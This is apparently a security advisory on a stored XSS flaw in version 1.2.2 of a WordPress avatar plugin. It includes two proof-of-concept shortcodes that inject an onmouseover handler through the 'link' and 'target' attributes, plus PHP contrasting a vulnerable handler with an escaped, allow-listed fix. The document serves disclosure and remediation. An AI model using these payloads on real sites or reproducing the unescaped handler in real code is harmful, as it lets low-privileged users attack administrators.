Description

The plugin does not properly sanitize and escape some of its shortcode attributes, which could allow relatively low-privileged users such as Contributors to conduct Stored XSS attacks.
As a Contributor+, create a new post and add one of the following shortcodes:

[avatar user="admin" size="96" align="left" link='" onmouseover="alert(/XSS/)"' /]

[avatar user="admin" size="96" align="left" link="/" target='" onmouseover="alert(/XSS/)"' /]

Save the post so that it is pending review. When an admin reviews the post and moves the mouse over the rendered shortcode output, the payload will be delivered.
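The root cause is a shortcode handler that interpolates attribute values straight into HTML. The following is an added illustration written for this advisory, not the affected plugin's code: the handler names, the attribute set and the use of `get_user_by()` / `get_avatar()` are assumptions modelled on the `[avatar ...]` shortcode in the PoC. The vulnerable pattern is shown beside a hardened version that escapes each attribute for the context it lands in and restricts free-form values to an allow-list.

```php
<?php
// Added example for this advisory; not the plugin's own code.
// Handler names, attributes and helper calls are assumptions.

// Vulnerable pattern: attribute values are concatenated into HTML unescaped,
// so a value containing a quote can close the attribute and add new ones.
function example_avatar_shortcode_vulnerable( $atts ) {
    $a = shortcode_atts( array(
        'user'   => '',
        'size'   => '96',
        'align'  => 'left',
        'link'   => '',
        'target' => '_self',
    ), $atts, 'avatar' );

    $user = get_user_by( 'login', $a['user'] );
    $img  = $user ? get_avatar( $user->ID, (int) $a['size'] ) : '';

    return '<a href="' . $a['link'] . '" target="' . $a['target'] . '"'
         . ' class="align' . $a['align'] . '">' . $img . '</a>';
}

// Hardened version: enumerated attributes are allow-listed, numeric ones are
// cast, the URL goes through esc_url() and everything else through esc_attr().
function example_avatar_shortcode_fixed( $atts ) {
    $a = shortcode_atts( array(
        'user'   => '',
        'size'   => '96',
        'align'  => 'left',
        'link'   => '',
        'target' => '_self',
    ), $atts, 'avatar' );

    // Only known values are accepted; anything else falls back to the default.
    $align  = in_array( $a['align'], array( 'left', 'right', 'center', 'none' ), true )
        ? $a['align'] : 'left';
    $target = in_array( $a['target'], array( '_self', '_blank' ), true )
        ? $a['target'] : '_self';
    $size   = absint( $a['size'] );
    if ( 0 === $size ) {
        $size = 96;
    }

    $user = get_user_by( 'login', $a['user'] );
    $img  = $user ? get_avatar( $user->ID, $size ) : '';
    if ( '' === $img ) {
        return '';
    }

    if ( '' === $a['link'] ) {
        return '<span class="align' . esc_attr( $align ) . '">' . $img . '</span>';
    }

    // esc_url() drops disallowed schemes (e.g. javascript:) and escapes the
    // value for use inside an HTML attribute; esc_attr() encodes quotes so the
    // attribute cannot be closed early.
    return sprintf(
        '<a href="%s" target="%s" class="align%s">%s</a>',
        esc_url( $a['link'] ),
        esc_attr( $target ),
        esc_attr( $align ),
        $img
    );
}
add_shortcode( 'avatar', 'example_avatar_shortcode_fixed' );
```

Note that the Contributor role lacks the `unfiltered_html` capability, so WordPress strips event-handler attributes from the post body itself; the bypass works because shortcodes expand at render time, after that filtering, and the plugin's output is trusted as-is. Escaping therefore has to happen in the handler.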
| CPE | Name | Operator | Version |
|---|---|---|---|
| | | eq | 1.2.2 |